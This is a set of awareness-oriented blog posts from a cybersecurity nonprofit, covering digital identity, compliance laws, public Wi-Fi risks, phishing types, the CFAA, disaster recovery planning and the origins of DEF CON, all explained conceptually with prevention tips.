I decided to pursue the path of cybersecurity early Spring of this year. It has become more and more evident to me how important it is to implement it on every level, from your personal devices and home networks to small-medium sized businesses, large corporations, and industrial control systems, and to create awareness designed differently for each age group.


Like the following quote, “Your internal reality becomes your external reality.” (Unknown), it’s relevant to say that this applies everywhere, even in the cyber world. If the internal systems are flawed or compromised, it might show as a data breach, a business closure, or financial loss.


If you haven't been keeping up with Simply Cyber’s Daily Cyber News Brief every weekday, you are missing out! First of all, the community never has a dull moment; second, there is always something happening in the digital world that we don’t hear about on mainstream news. Technology changes every day. Being informed about what is happening is an effective way to learn how to prevent ourselves from getting compromised.


As we approach Cybersecurity Awareness Month in October, below are some great resources to better prepare ourselves and help protect one another from online incidents:

Cybersecurity Central is proud to be an official 2022 Cybersecurity Awareness Month Champion organization with National Cybersecurity Alliance.


There’s no better time than to start now. Stay safe, stay aware, and stay secure.


SEP 7, 2022

Offline vs. Online Identities

by Eula Chua

September 14, 2022

Did you know you have two identities? Well technically, it’s two parts of your identity. Don’t worry, I didn’t either but it turns out that the identity we normally refer to is only one half of what we have. Many forget that our digital identity counts and is as important as our real-life identity.

Let’s call them: offline and online. So, what’s the difference?

Our offline identity is what we mostly refer to. It is who we are, our real-life personas, and how others know us. This is the identity we use at home, at work, or at school. The offline identity includes personal details of our life that even our friends and family might know, such as our full name, date of birth, age, address, and even our favourite colours.

Our online identity is the digital identity that we carry, that indicates who we are and how we present ourselves. This is our online persona. This can include our usernames, emails, or aliases for our accounts. The moment we are active on the web is the moment our online identity is established, regardless whether we create an account online or not.

It’s important to keep in mind that both identities should be secured as each one comes with different risks. Even if one is more secure, this could still pose a risk to the other as both offline and online identities can be entryways or an attack surface.

What preventable measures can we take to protect our offline and online identities?

Awareness is key. Let’s first look into social engineering.

Social engineering attacks are a common way to gain information using social tactics. As we will look into the specifics of social engineering attacks in the future, for this topic, we will focus on shoulder surfing.

Shoulder surfing is a type of social engineering attack where someone casually observes over the shoulder of another person to gain unauthorized information. This is a simple technique that is used for gathering sensitive information, such as credentials, or monetary gains and is often committed in office environments.

Check out some practical ways to prevent shoulder surfing:


Additional steps we can take are to avoid using the things in the list below, to help protect our identity:



Now that we know that our identity is split into two parts, let’s make sure we protect both identities as best as we can. Help us spread awareness by sharing our blog to your network!

To learn more about your digital identity, check out the references below.

References:

Digital identity for individuals. (2017). NIST. https://www.nist.gov/itl/applied-cybersecurity/tig/digital-identity-individuals

Gibson, D. (2020). CompTIA security + : get certified get ahead SY0-601 study guide. Ycda, Llc.

Introduction to Cybersecurity. (2018, January 22). Networking Academy. https://www.netacad.com/courses/cybersecurity/introduction-cybersecurity

Compliance Frameworks

by James Driscoll

September 14, 2022

While studying for my CompTIA CySA+ examination I came across several regulatory frameworks. So, I thought it would be a good idea to create a blog to briefly discuss each one. The regulatory frameworks that I came across include the Health Insurance Portability and Accountability Act (HIPAA); the Payment Card Industry Data Security Standard (PCI DSS); the Gramm-Leach Bliley Act (GLBA); the Sarbanes-Oxley (SOX) Act; and finally, the Family Educational Rights and Privacy Act (FERPA).

The first framework I will cover is HIPAA. HIPAA became a law back in 1996 and was designed to facilitate employees changing jobs to take their insurance with them. It was also designed to make health care delivery more efficient (HIPAA History, n.d.). The heart of HIPAA lies in the security and privacy rules that all healthcare providers, insurance companies, and health information clearinghouses must comply with (Chapple & Seidl, 2017).

The second framework is PCI DSS. The interesting aspect about this standard is that unlike all the others, it is not a law, but rather a collaborative agreement among the major credit card companies (Chapple & Seidl, 2017). This agreement was established in 2004. Now, even though it is not a law, non-compliance still has consequences. These consequences range from simple fines levied by the banks themselves all the way to an organization not being able to take payment cards as a form of payment (Petree, 2019).

The third framework is the GLBA. This standard is applicable to the banking industry. The basic premise is that all financial institutions have a security program and someone to run it (Chapple & Seidl, 2017). It became law back in 1999. This act also mandates that these same organizations communicate how they share and protect customer information (Gramm-Leach-Bliley Act, n.d.).

The fourth framework is the SOX Act. This act applies to any organization that is publicly traded (Chapple & Seidl, 2017). It became law in 2002 in response to numerous financial scandals and was established to thwart these same organizations from defrauding their investors. It is named for the two members of Congress that sponsored it, Senator Paul S. Sarbanes, and Representative Michael G. Oxley (Kenton, 2022).

The last framework to be covered is the FERPA. This act mandates that educational institutions protect student information (Chapple & Seidl, 2017). FERPA became law back in 1974 and has a dual purpose. 1) Returns control of educational records back to the parents or to adult students. 2) Requires written consent from parents or adult students before an educational institution can release Personally Identifiable Information (PII) that is within those records (Family Educational Rights and Privacy Act (FERPA), n.d.).

References:

Chapple, M., & Seidl, D. (2017). CompTIA CySA+ Study Guide. Sybex.

Family Educational Rights and Privacy Act (FERPA). (n.d.). Retrieved from Centers for Disease Control and Prevention: https://www.cdc.gov/phlp/publications/topic/ferpa.html

Gramm-Leach-Bliley Act. (n.d.). Retrieved from Federal Trade Commission: https://www.ftc.gov/business-guidance/privacy-security/gramm-leach-bliley-act

HIPAA History. (n.d.). Retrieved from HIPAA JOurnal: https://www.hipaajournal.com/hipaa-history/

Kenton, W. (2022, May 08). Sarbanes-Oxley (SOX) Act of 2002. Retrieved from Investopedia: https://www.investopedia.com/terms/s/sarbanesoxleyact.asp

Petree, S. (2019, January 4). Five Risks for PCI DSS Non-Compliance. Retrieved from Plante Moran: https://www.plantemoran.com/explore-our-thinking/insight/2017/08/five-risks-for-pci-dss-non-compliance#:~:text=%20Five%20risks%20for%20PCI%20DSS%20non-compliance%20,can%20place%20restrictions%20on%20organizations%20such...%20More%20

SEP 7, 2022

What's Happening in Tech & InfoSec? How To Stay (Somewhat) Up-to-Date with Podcasts

by Kimberly McKnight

September 9, 2022

One of the reasons I've made so many connections is tuning into livestreams, attending webinars, and listening to podcasts, then reaching out to those who inspire me and making a personal connection.  It's also how I am able to (somewhat) stay up-to-date on infosec news and events. 


For today's blog, I wanted to cover podcasts. This is the next section to be built out on the resources page, but to align with the resources already on our site, I want to provide you with the foundations.  One topic that isn't highlighted yet on the CC Resources page is podcasts.  Podcasts are critical to staying current on what's happening in the worlds of tech and cyber. 


Below are some of what I feel are must listen podcasts.  Some are daily, others weekly, or even monthly.  How do I find time to listen and keep up?  Full transparency, I don't get to keep up with all of them all the time, but I definitely find time to listen in the morning, a little during the day, a lot at night, and even small doses on the weekends.  I enjoy mixing podcasts that aren't all technical and also include the human side of things:   



Please note: The podcast list above is a only a quick snapshot.  There are many more I've listened to and recommend, and will include in the CC Resources page in the future, as well.  


One of the primary reasons I named this nonprofit foundation Cybersecurity Central was because I want it to be a resource to those who desire is to learn more about where to learn more about all things cybersecurity.  Cybersecurity Central has a resources page newly released, but there are many topics still to be added from the lists I've accumulated over the past 2 years, researching and discovering where some of the most applicable, engaging, and trustworthy resources.  Feel free to check out the CC Resources page for a flavor of the absolute essentials everyone should check out.  Be sure to bookmark and check back regularly for new resources.  I have TONS of resources still to share, but building it out one by one is super tedious, bear with me. ;)

 

If you haven't already, be sure to check out Cybersecurity Central’s YouTube channel.

 

And while you are there, please subscribe, like, and share with your network if you found some valueTake care and thanks as always for the continued support for Cybersecurity Central!


Common Attacks on Public Wi-Fi

by Eula Chua

September 7, 2022

From an end user’s perspective, it can be exciting when we find free Wi-Fi is available. Unfortunately, “free” does not always mean it’s safe to use. In today’s blog, we will bridge from last week’s blog topic, Public Wi-Fi is Not Your Friend, and highlight some of the risks of using public Wi-Fi.


Although there are many risks that can occur, we will focus on the following three common attacks:



Identity Theft

We often use our identity to verify who we truly are in order to open or access important accounts like our bank accounts. It is crucial that we keep our personal information safe and protected to prevent others from stealing it. This is what identity theft is – when someone steals your personal information such as your name, address, credit card information, social security numbers, health insurance numbers and more. Those who attempt to steal these sensitive information often use it to commit identity fraud for financial gain. To prevent identity theft from occurring, especially under public wi-fi, avoid visiting websites where you’re required to fill in your personal information or bank login credentials.


On-Path Attack/Man-In-The-Middle Attack

With an open connection, there can be an influx of network packets traveling within that network all coming from different devices. This is susceptible to an on-path attack, where a different, and possibly malicious, computer can intercept the connection between two other computers within the same network. This is a form of active eavesdropping. Be aware that any unusual activity, such as having large amounts of data transfers occur over public wi-fi, may possibly indicate an on-path attack. For prevention, devices are recommended to be equipped with anti-malware software, firewalls, and intrusion detection systems. As with any device, ensure that strong passwords are always used and that software are regularly patched and updated.


Session Hijacking

Session hijacking is similar to the on-path attack. The goal is to either steal personal information, execute a denial-of-service attack, or infect a system with malware. Rather than intercepting between two computers, the malicious hacker intercepts a connection between the computer and the server of a website by recording your session ID. Session IDs may be attached to links or requests that are sent to the websites you visit. Active, passive, and hybrid are the three different types of session hijacking attacks that also include different techniques on how it’s conducted. To prevent this, avoid clicking links you’re unsure about, make sure to log out of your accounts in each session to terminate it, install a firewall and anti-virus software on your device, ensure that the websites that are visited are secured, with URLs beginning with “HTTPS”, and last but not least, use a VPN (virtual private network). Using a VPN will make it more difficult for hackers to intercept traffic.


In Conclusion


There are many other threats out there that need to be covered, but we will need to take things one step at a time. The more devices we hold, the more points of entry we have open. Cybersecurity attacks and breaches happen quite frequently and the scary part is that we might not even know it’s happening until it reaches the news. Prevention is one of the best ways to protect ourselves and our systems from any attack. We don’t always know how to prevent unless we know what we are preventing from. This is why the importance of cybersecurity awareness is crucial to all users. We hope that we can continue to bring you more cybersecurity awareness content to you here at Cybersecurity Central to help you stay protected online.


AUG 31, 2022

The Computer Fraud and Abuse Act (CFAA)

by James Driscoll

August 31, 2022

We see news stories almost daily of threat actors hacking into an organizations computer network and either taking the data or encrypting it unless said organization pays a ransom.  Now, we all know that this is illegal, but do we know why it is illegal?  The answer lies within 18 U.S. Code 1030, also known as the Computer Fraud and Abuse Act (CFAA) which became law in 1986.  This blog will discuss the specifics of the CFAA, what lead to its passing, and most recent updates.   


History of CFAA

The CFAA got its start as part of another statute called the Comprehensive Crime Act of 1984.  There was a part of this act that made the following two activities related to computers illegal.  1) Gaining unauthorized access to a computer.  2) Having access to a computer but accessing areas that are not authorized (CFAA Background, 2022).  Basically, this is privilege escalation.  


Now for someone to be charged under the Comprehensive Crime Act because of hacking, the victims were limited to government interests.  More specifically the actions had to involve one of three scenarios.  1) Accessing information vital to national security.  2) Gaining access to personal financial records.  3) Gaining unauthorized access to government computers (CFAA Background, 2022).  


Let's skip ahead to 1986.  This is when the provisions of the Comprehensive Crime Act of 1984 related to computer crime officially became 18 U.S. Code 1030, The Computer Fraud and Abuse Act (CFAA).  This separation facilitated the addition of three more prohibitions: 


Now, in addition to what was mentioned above, lets see was else is in the CFAA.  There are also punishments defined in this document.  These punishments are defined by the type of offense.  In addition, the CFAA dictates who (depending on the offense) will investigate.  It will either be the Federal Bureau of Investigation (FBI) or the United States Secret Service.  Finally, definitions of certain terms at the end of the document (18 U.S. Code 1030 - Fraud and Related Activity in Connection with Computers, n.d.).


2022 Update

Over the years, the CFAA has been updated numerous times.  The most recent update was in May 2022.  Basically, what this update affirms is that “good-faith security research should not be charged” (Department of Justice Announces New Policy for Charging Cases under Computer Fraud and Abuse Act, 2022).  This update goes on to define good-faith security research, but essentially it means hacking into a network (with the owner’s permission) to test for vulnerabilities so they can be mitigated, thus protecting the CIA Triad of that network (Department of Justice Announces New Policy for Charging Cases under Computer Fraud and Abuse Act, 2022).


Conclusion

I highly recommend at least scanning over it.  I think it is an interesting read, of course I am a bit of a nerd so I may be a little biased.  Nonetheless, it is important to be at least familiar with applicable laws, especially if anyone is wanting to get into penetration testing.  This way you will have an idea of how far you can go without breaking the law, because I will tell you as someone with a criminal justice degree, claiming ignorance of the law is not a defense.


References:

18 U.S. Code 1030 - Fraud and Related Activity in Connection with Computers. (n.d.). Retrieved from cornell.edu: https://www.law.cornell.edu/uscode/text/18/1030 

CFAA Background. (2022, July 14). Retrieved from NACDL: https://www.nacdl.org/Content/CFAABackground 

Department of Justice Announces New Policy for Charging Cases under Computer Fraud and Abuse Act. (2022, May 19). Retrieved from Justice.gov:

 https://www.justice.gov/opa/pr/department-justice-announces-new-policy-charging-cases-under-computer-fraud-and-abuse-act 


Public Wi-Fi is Not Your Friend

by Eula Chua

August 31, 2022

I have been deceived and probably, so have you.

There was a time in life when my friends and I would get excited when Wi-Fi became publicly accessible in certain coffee shops, restaurants, airports, and libraries. This meant that we didn’t have to spend extra money to pay for cellular data overages.

We would instantly connect wherever public Wi-Fi was available as if he hit a jackpot. Okay, maybe that’s a little exaggerated. But it defined the quote, “the best things in life are free.”

Although that quote does not exactly hold true. It should have been, “the free things in life come with consequences.” Here is where convenience versus security comes to mind.

Public Wi-Fi is not our friend. Connecting to it puts ourselves at potential risk. At your discretion, you can use it when it comes to desperate measures but if it’s possible, avoid it at all costs.

I’ll tell you why.

There are probably hundreds of people passing by the same location as you. This means with these hotspots, any one of these people can connect. This also means any one of these people may be a cyber criminal.

Another point to think about is how the public Wi-Fi was configured. Was it properly secured? Are you able to gain access to the network as an admin? Maybe they didn’t change the default settings on their router.

Here are a few risks that may be encountered through using public Wi-Fi:



We will go over each one of these in a future post. But for now, what can we do to protect ourselves and mitigate the risks that we can control?


Here is a list compiled by Get Cyber Safe, a Canadian national public awareness campaign:



Do you have other recommendations, tips, or tricks on how to protect ourselves online? Visit us on social and let us know!


Below are some great resources and studies to check out regarding public Wi-Fi:


(PDF) Why do people use unsecure public Wi-Fi? An investigation of behaviour and factors driving decisions

Public Wi-Fi - Get Cyber Safe


https://irjhis.com/paper/IRJHISIC2203054.pdf


Until next time, stay safe out there… and online!


AUG 24, 2022

Let’s Talk About Phishing

by Eula Chua

August 24, 2022

Did you know there are different kinds of phishing attacks that exist? First, let’s define what phishing means.

According to Phishing.org, phishing is “a cybercrime in which a target or targets are contacted by email, telephone or text message by someone posing as a legitimate institution to lure individuals into providing sensitive data such as personally identifiable information, banking and credit card details, and passwords.”

Phishing is one of the most common ways for cyber attackers to target people online via email. Many times, this type of attack is used on specific groups of people or high-profile individuals to gain personal information and most of the time, for financial gains.

As phishing continues to adapt, cyber attackers have found other communicative pathways to trick users into providing information. Some examples are voice messages, SMS text messages, and phishing through search engines. There are multiple ways in which phishing techniques are conducted, however, in today’s blog, we will be focusing on the different types: email phishing, vishing, smishing, spearphishing, and whaling


Email phishing

When we hear phishing, we automatically think of email phishing. That’s because it is the most common technique used to conduct a phishing attack. If you check your spam/junk folder in your inbox right now, you might notice emails coming from unknown email addresses with odd subject lines. There could also be emails coming from people you think you know. Beware that the purpose of phishing is to trick users into revealing personal information and believing that the sender or organization is legitimate. How is this conducted? Usually, phishing attacks that are done through email may contain links that lead to a malicious website that appears legitimate. These websites could either load up a trojan virus or something that enables you to input your credentials. Other emails could contain malicious attachments.


Vishing aka. Voice phishing

Vishing is a combination of “voice” and “phishing”. This occurs when a “phisher” utilizes a phone system to lure their targets into providing their personal information or credentials, mainly for financial gain. VoIP (Voice over IP) technology is often used for these attacks because it’s easier for the attacker to pretend that they are from an actual known company, by spoofing their caller ID.


Smishing aka. SMS phishing

“SMS” and “phishing” make up the term “Smishing”. Rather than it being done through email, phishing is done via text message. With the same purpose of gaining personal or financial information from a target, malicious links and attachments can also be sent through text. Smishing can also be used to obtain verification codes if the target’s phone is used for multi-factor authentication for their credentials.


Spearphishing vs. Whaling

If you get these two terms mixed up, you are not alone. Let’s go over the main differences.

Spearphishing is a specific type of phishing in which an attack is conducted on a particular person or specific groups of users, most often within an organization.

Whaling is a specific type of spearphishing, where a high-level executive is either the victim or the one being impersonated.

There are so many different ways a phishing attack can be done. Importance of end-user security awareness is crucial to our online safety and privacy as phishing attempts occur every minute of every day.


As end-users, how can we do our part to prevent these phishing attacks from progressing?



If you would like to learn more about phishing, here are some great resources to visit:

- https://www.getcybersafe.gc.ca/en/blogs/phishing-introduction

- https://phishing.org

- https://www.microsoft.com/en-ca/security/business/security-101/what-is-phishing

- https://cybersecurityguide.org/resources/phishing/

- https://www.phishprotection.com/resources/what-is-phishing/

Why Every Organization Needs a Disaster Recovery / Business Continuity Plan 

by James Driscoll

August 24, 2022

Disasters, whether natural or man-made, are inevitable. Every company no matter the size or location is going to experience one. How quickly they recover, if at all, depends on whether they have a Business Continuity / Disaster Recovery Plan (BC / DRP). According to the American Management Association, half of the businesses that do not have a BC / DRP and experience a disaster, close their doors forever, (An Overview of U.S. Regulations Pertaining to Business Continuity, n.d.).


For a BC / DR plan to be successful the following five steps should be taken:


1. Be proactive with planning – Basically what this is saying is to create a list of as many conceivable disasters as possible. The imagination is the only limiting factor here if the disaster is conceivable. For example, a company in North Dakota planning for a hurricane is not conceivable.

2. Identify the organizations critical functions and infrastructure – This is the time a company would conduct a business impact analysis. This serves two purposes. First, critical functions can be discovered. Second, the company can make educated guesses causes of disruptions and the repercussions of those disruptions.

3. Create emergency response policies and procedures – This is the meat and potatoes of the process. Creating the BC / DR plan based on the information from steps one and two while also considering any applicable government regulations.

4. Document backup and restoration process – This involves writing down the procedures for backing up the companies’ data prior to a disaster and subsequently restoring it during the recovery phase after a disaster.

5. Perform tests and exercises – A plan is worthless if the employees are unfamiliar with it or do not even know it exists. This is where testing it comes in. Testing a plan makes the employees familiar with it which results in them being able to respond quicker. This is paramount in a disaster where time is critical. It also shows where there are holes in the plan so they can be fixed before a disaster occurs (Delchamps, 2020).


When creating the BC plan, one of the main things to consider is the backup location. This location may have its own risks from disasters that need to be anticipated. Six items that need to be considered when choosing a backup location include:


1. Natural Disaster - Depending on the location, especially if it is close to the primary location, the company could be faced with a disaster-within-the-disaster, resulting in both locations being taken offline. The way to mitigate this is if feasible to pick a location further away.

2. Infrastructure Disruption – This would be the result of damage to infrastructure, for example loss of power, or road closures. The mitigation for loss of power is for the company to invest in backup generators. The mitigation for road closures is to have a backup location that can be reached via multiple routes, or find a location where employees are close by that may be able to walk to get to the site.

3. Human Error – Humans are not psychic. We need to be passed information. A company may have the best BC /DR plan ever created however, if the employees do not know anything about it, it is worthless. The way to mitigate this is through communication.

4. Cyber Attack – While transferring the data to the backup site, companies need to ensure that their customers information is safe and not going to be subject to a cyber-attack. This can be mitigated by ensuring devices at the backup location are constantly patched and updated, anti-virus is used, and data is encrypted.

5. Compliance – No matter where the company is operating of, whether it is the primary location or the backup site, they still need to comply with all applicable regulations. The way to achieve that is to treat the backup site the same as the primary location. That means whenever something is done to the primary location, it is also done to the backup location.

6. Physical Security – Physical security is just as important as securing the companies data. There are a couple ways to achieve this. The company could invest in a security system to include cameras. Another way is to hire security guards to monitor the building (Sampera, 2020).


References:

An Overview of U.S. Regulations Pertaining to Business Continuity. (n.d.). Retrieved from Geminare: https://www.geminare.com/wp-content/uploads/U.S._Regulatory_Compliance_Overview.pdf

Delchamps, H. (2020, March 9). 5 Steps to Creating a Backup and Disaster Recovery Plan. Retrieved from Memphis Business Journal: https://www.bizjournals.com/memphis/news/2020/03/09/5-steps-to-creating-a-backup-and-disaster-recovery.html

Sampera, E. (2020, March 5). 6 Essential Risk Mitigation Strategies for Your Business. Retrieved from VXchange: https://www.vxchnge.com/blog/essential-risk-mitigation-strategies

AUG 17, 2022

DEF CON: The Beginning

by James Driscoll

August 17, 2022

DEF CON was this past weekend and I started wondering about how it started and when. So, I decided this would be an awesome topic, although I wish I had the idea before last weeks blog went out. 


Now, I do not know about anyone else, but I have always wondered not only how DEC CON originated, and also how the name originated. As you will discover below, it is quite interesting.


It turns out that the name did not originate where I thought it did. With a 20 career in the Air Force, it was my impression that DEF CON was taken from the term for Defense Readiness Condition. While this is accurate and was the inspiration due to the 1980’s movie called “Wargames”. The basic premise of this movie is that a young kid connects to a government system that controls the United States nuclear arsenal. If I had to guess, I would say that it is probably the original hacking movie, but I digress a little bit. It turns out that in the current context, DEF derives from the number three key on a telephone and the CON derives from the world conference. Interesting side note, the official spelling is DEF CON.